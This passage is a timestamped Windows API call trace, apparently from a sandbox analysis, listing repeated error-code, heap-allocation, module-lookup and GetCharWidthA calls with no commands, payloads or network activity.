(dwErrCode=0x0) [0045.392] GetLastError () returned 0x0 [0045.392] SetLastError (dwErrCode=0x0) [0045.392] GetLastError () returned 0x0 [0045.392] SetLastError (dwErrCode=0x0) [0045.392] GetLastError () returned 0x0 [0045.392] SetLastError (dwErrCode=0x0) [0045.392] GetLastError () returned 0x0 [0045.392] SetLastError (dwErrCode=0x0) [0045.392] GetLastError () returned 0x0 [0045.392] SetLastError (dwErrCode=0x0) [0045.392] GetLastError () returned 0x0 [0045.392] SetLastError (dwErrCode=0x0) [0045.392] GetLastError () returned 0x0 [0045.392] SetLastError (dwErrCode=0x0) [0045.392] GetLastError () returned 0x0 [0045.392] SetLastError (dwErrCode=0x0) [0045.393] GetLastError () returned 0x0 [0045.393] SetLastError (dwErrCode=0x0) [0045.393] GetLastError () returned 0x0 [0045.393] SetLastError (dwErrCode=0x0) [0045.393] GetLastError () returned 0x0 [0045.393] SetLastError (dwErrCode=0x0) [0045.393] GetLastError () returned 0x0 [0045.393] SetLastError (dwErrCode=0x0) [0045.393] GetLastError () returned 0x0 [0045.393] SetLastError (dwErrCode=0x0) [0045.393] GetLastError () returned 0x0 [0045.393] SetLastError (dwErrCode=0x0) [0045.393] GetLastError () returned 0x0 [0045.393] SetLastError (dwErrCode=0x0) [0045.393] GetLastError () returned 0x0 [0045.393] SetLastError (dwErrCode=0x0) [0045.393] GetLastError () returned 0x0 [0045.394] SetLastError (dwErrCode=0x0) [0045.394] GetLastError () returned 0x0 [0045.394] SetLastError (dwErrCode=0x0) [0045.394] GetLastError () returned 0x0 [0045.394] SetLastError (dwErrCode=0x0) [0045.394] GetLastError () returned 0x0 [0045.394] SetLastError (dwErrCode=0x0) [0045.394] GetLastError () returned 0x0 [0045.394] SetLastError (dwErrCode=0x0) [0045.394] GetLastError () returned 0x0 [0045.394] SetLastError (dwErrCode=0x0) [0045.394] GetLastError () returned 0x0 [0045.394] SetLastError (dwErrCode=0x0) [0045.394] GetLastError () returned 0x0 [0045.394] SetLastError (dwErrCode=0x0) [0045.394] GetLastError () returned 0x0 [0045.394] SetLastError (dwErrCode=0x0) [0045.394] GetLastError () returned 0x0 [0045.395] SetLastError (dwErrCode=0x0) [0045.395] GetLastError () returned 0x0 [0045.395] SetLastError (dwErrCode=0x0) [0045.395] GetLastError () returned 0x0 [0045.395] SetLastError (dwErrCode=0x0) [0045.395] GetLastError () returned 0x0 [0045.395] SetLastError (dwErrCode=0x0) [0045.395] GetLastError () returned 0x0 [0045.395] SetLastError (dwErrCode=0x0) [0045.395] GetLastError () returned 0x0 [0045.395] SetLastError (dwErrCode=0x0) [0045.395] GetLastError () returned 0x0 [0045.395] SetLastError (dwErrCode=0x0) [0045.395] GetLastError () returned 0x0 [0045.395] SetLastError (dwErrCode=0x0) [0045.395] GetLastError () returned 0x0 [0045.395] SetLastError (dwErrCode=0x0) [0045.395] GetLastError () returned 0x0 [0045.396] SetLastError (dwErrCode=0x0) [0045.396] GetLastError () returned 0x0 [0045.396] SetLastError (dwErrCode=0x0) [0045.396] GetLastError () returned 0x0 [0045.396] SetLastError (dwErrCode=0x0) [0045.396] GetLastError () returned 0x0 [0045.396] SetLastError (dwErrCode=0x0) [0045.396] GetLastError () returned 0x0 [0045.396] SetLastError (dwErrCode=0x0) [0045.396] GetLastError () returned 0x0 [0045.396] SetLastError (dwErrCode=0x0) [0045.396] GetLastError () returned 0x0 [0045.396] SetLastError (dwErrCode=0x0) [0045.396] GetLastError () returned 0x0 [0045.396] SetLastError (dwErrCode=0x0) [0045.396] GetLastError () returned 0x0 [0045.396] SetLastError (dwErrCode=0x0) [0045.396] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x98) returned 0x2f19d0 [0045.397] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x1f) returned 0x2f1a70 [0045.397] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x36) returned 0x2f1a98 [0045.397] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x37) returned 0x2f1ad8 [0045.397] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x3c) returned 0x2f1b18 [0045.397] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x31) returned 0x2f1b60 [0045.397] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x17) returned 0x2f1ba0 [0045.397] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x24) returned 0x2f1bc0 [0045.397] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x14) returned 0x2f1bf0 [0045.397] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xd) returned 0x2f1c10 [0045.397] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x25) returned 0x2f1c28 [0045.397] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x39) returned 0x2f1c58 [0045.397] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x18) returned 0x2f1ca0 [0045.397] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x17) returned 0x2f1cc0 [0045.397] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xe) returned 0x2f1ce0 [0045.397] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x69) returned 0x2f1cf8 [0045.397] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x3e) returned 0x2f1d70 [0045.397] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x1b) returned 0x2f1db8 [0045.397] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x1d) returned 0x2f1de0 [0045.397] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x48) returned 0x2f1e08 [0045.397] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x12) returned 0x2f1e58 [0045.397] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x18) returned 0x2f1e78 [0045.397] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x1b) returned 0x2f1e98 [0045.397] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x24) returned 0x2f1ec0 [0045.397] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x29) returned 0x2f1ef0 [0045.397] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x1e) returned 0x2f1f28 [0045.397] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x41) returned 0x2f1f50 [0045.397] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x17) returned 0x2f1fa0 [0045.397] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xf) returned 0x2f1fc0 [0045.397] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x16) returned 0x2f1fd8 [0045.398] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x2a) returned 0x2f1ff8 [0045.398] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x29) returned 0x2f2030 [0045.398] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x15) returned 0x2f2068 [0045.398] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x1e) returned 0x2f2088 [0045.398] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x2a) returned 0x2f20b0 [0045.398] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x12) returned 0x2f20e8 [0045.398] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x18) returned 0x2f2108 [0045.398] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x46) returned 0x2f2128 [0045.398] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x2f11f8 | out: hHeap=0x2f0000) returned 1 [0045.398] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x76d30000 [0045.398] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0045.398] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0045.400] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x80) returned 0x2f11f8 [0045.400] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x800) returned 0x2f2178 [0045.400] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f11f8) returned 0x80 [0045.401] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40b5f8) returned 0x0 [0045.401] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f11f8) returned 0x80 [0045.405] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f11f8) returned 0x80 [0045.405] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f11f8) returned 0x80 [0045.406] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f11f8) returned 0x80 [0045.406] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f11f8) returned 0x80 [0045.407] GetLastError () returned 0x0 [0045.407] SetLastError (dwErrCode=0x0) [0045.407] GetLastError () returned 0x0 [0045.407] SetLastError (dwErrCode=0x0) [0045.407] GetLastError () returned 0x0 [0045.407] SetLastError (dwErrCode=0x0) [0045.407] GetLastError () returned 0x0 [0045.407] SetLastError (dwErrCode=0x0) [0045.407] GetLastError () returned 0x0 [0045.407] SetLastError (dwErrCode=0x0) [0045.407] GetLastError () returned 0x0 [0045.407] SetLastError (dwErrCode=0x0) [0045.407] GetLastError () returned 0x0 [0045.407] SetLastError (dwErrCode=0x0) [0045.407] GetLastError () returned 0x0 [0045.407] SetLastError (dwErrCode=0x0) [0045.407] GetLastError () returned 0x0 [0045.407] SetLastError (dwErrCode=0x0) [0045.407] GetLastError () returned 0x0 [0045.407] SetLastError (dwErrCode=0x0) [0045.407] GetLastError () returned 0x0 [0045.408] SetLastError (dwErrCode=0x0) [0045.408] GetLastError () returned 0x0 [0045.408] SetLastError (dwErrCode=0x0) [0045.408] GetLastError () returned 0x0 [0045.408] SetLastError (dwErrCode=0x0) [0045.408] GetLastError () returned 0x0 [0045.408] SetLastError (dwErrCode=0x0) [0045.408] GetLastError () returned 0x0 [0045.408] SetLastError (dwErrCode=0x0) [0045.408] GetLastError () returned 0x0 [0045.408] SetLastError (dwErrCode=0x0) [0045.408] GetLastError () returned 0x0 [0045.408] SetLastError (dwErrCode=0x0) [0045.408] GetLastError () returned 0x0 [0045.408] SetLastError (dwErrCode=0x0) [0045.408] GetLastError () returned 0x0 [0045.408] SetLastError (dwErrCode=0x0) [0045.408] GetLastError () returned 0x0 [0045.408] SetLastError (dwErrCode=0x0) [0045.408] GetLastError () returned 0x0 [0045.409] SetLastError (dwErrCode=0x0) [0045.409] GetLastError () returned 0x0 [0045.409] SetLastError (dwErrCode=0x0) [0045.409] GetLastError () returned 0x0 [0045.409] SetLastError (dwErrCode=0x0) [0045.409] GetLastError () returned 0x0 [0045.409] SetLastError (dwErrCode=0x0) [0045.409] GetLastError () returned 0x0 [0045.409] SetLastError (dwErrCode=0x0) [0045.409] GetLastError () returned 0x0 [0045.409] SetLastError (dwErrCode=0x0) [0045.409] GetLastError () returned 0x0 [0045.409] SetLastError (dwErrCode=0x0) [0045.409] GetLastError () returned 0x0 [0045.409] SetLastError (dwErrCode=0x0) [0045.409] GetLastError () returned 0x0 [0045.409] SetLastError (dwErrCode=0x0) [0045.409] GetLastError () returned 0x0 [0045.409] SetLastError (dwErrCode=0x0) [0045.409] GetLastError () returned 0x0 [0045.409] SetLastError (dwErrCode=0x0) [0045.409] GetLastError () returned 0x0 [0045.410] SetLastError (dwErrCode=0x0) [0045.410] GetLastError () returned 0x0 [0045.410] SetLastError (dwErrCode=0x0) [0045.410] GetLastError () returned 0x0 [0045.410] SetLastError (dwErrCode=0x0) [0045.410] GetLastError () returned 0x0 [0045.410] SetLastError (dwErrCode=0x0) [0045.410] GetLastError () returned 0x0 [0045.410] SetLastError (dwErrCode=0x0) [0045.410] GetLastError () returned 0x0 [0045.410] SetLastError (dwErrCode=0x0) [0045.410] GetLastError () returned 0x0 [0045.410] SetLastError (dwErrCode=0x0) [0045.410] GetLastError () returned 0x0 [0045.410] SetLastError (dwErrCode=0x0) [0045.410] GetLastError () returned 0x0 [0045.410] SetLastError (dwErrCode=0x0) [0045.410] GetLastError () returned 0x0 [0045.410] SetLastError (dwErrCode=0x0) [0045.410] GetLastError () returned 0x0 [0045.411] SetLastError (dwErrCode=0x0) [0045.411] GetLastError () returned 0x0 [0045.411] SetLastError (dwErrCode=0x0) [0045.411] GetLastError () returned 0x0 [0045.411] SetLastError (dwErrCode=0x0) [0045.411] GetLastError () returned 0x0 [0045.411] SetLastError (dwErrCode=0x0) [0045.411] GetLastError () returned 0x0 [0045.411] SetLastError (dwErrCode=0x0) [0045.411] GetLastError () returned 0x0 [0045.411] SetLastError (dwErrCode=0x0) [0045.411] GetLastError () returned 0x0 [0045.411] SetLastError (dwErrCode=0x0) [0045.411] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0045.412] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.413] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.413] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.413] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.414] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.414] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.414] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.414] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.414] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.414] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.414] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.414] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.414] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.414] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.414] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.414] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.414] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.414] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.414] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.414] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.414] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.414] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.414] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.414] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.414] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.414] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.414] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.414] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.414] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.414] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.414] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.414] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.415] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.415] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.415] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.415] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.415] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.415] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.415] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.415] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.415] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.415] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.415] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.415] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.415] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.415] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.415] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.415] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.415] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.415] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.415] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.415] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.415] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.415] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.415] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.415] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.415] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.415] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.415] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.415] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.415] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.415] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.415] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.415] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.415] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.415] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.415] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.415] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.415] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.415] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.415] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.416] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.416] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.416] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.416] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.416] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.416] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.416] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.416] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.416] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.416] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.416] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.416] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.416] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.416] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.416] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.416] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.416] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.416] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.416] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.416] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.416] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.416] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.416] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.416] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.416] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.416] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.416] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.416] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.416] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.416] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.416] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.416] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.416] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.416] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.416] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.416] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.416] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.416] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.416] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.417] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.417] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.417] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.417] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 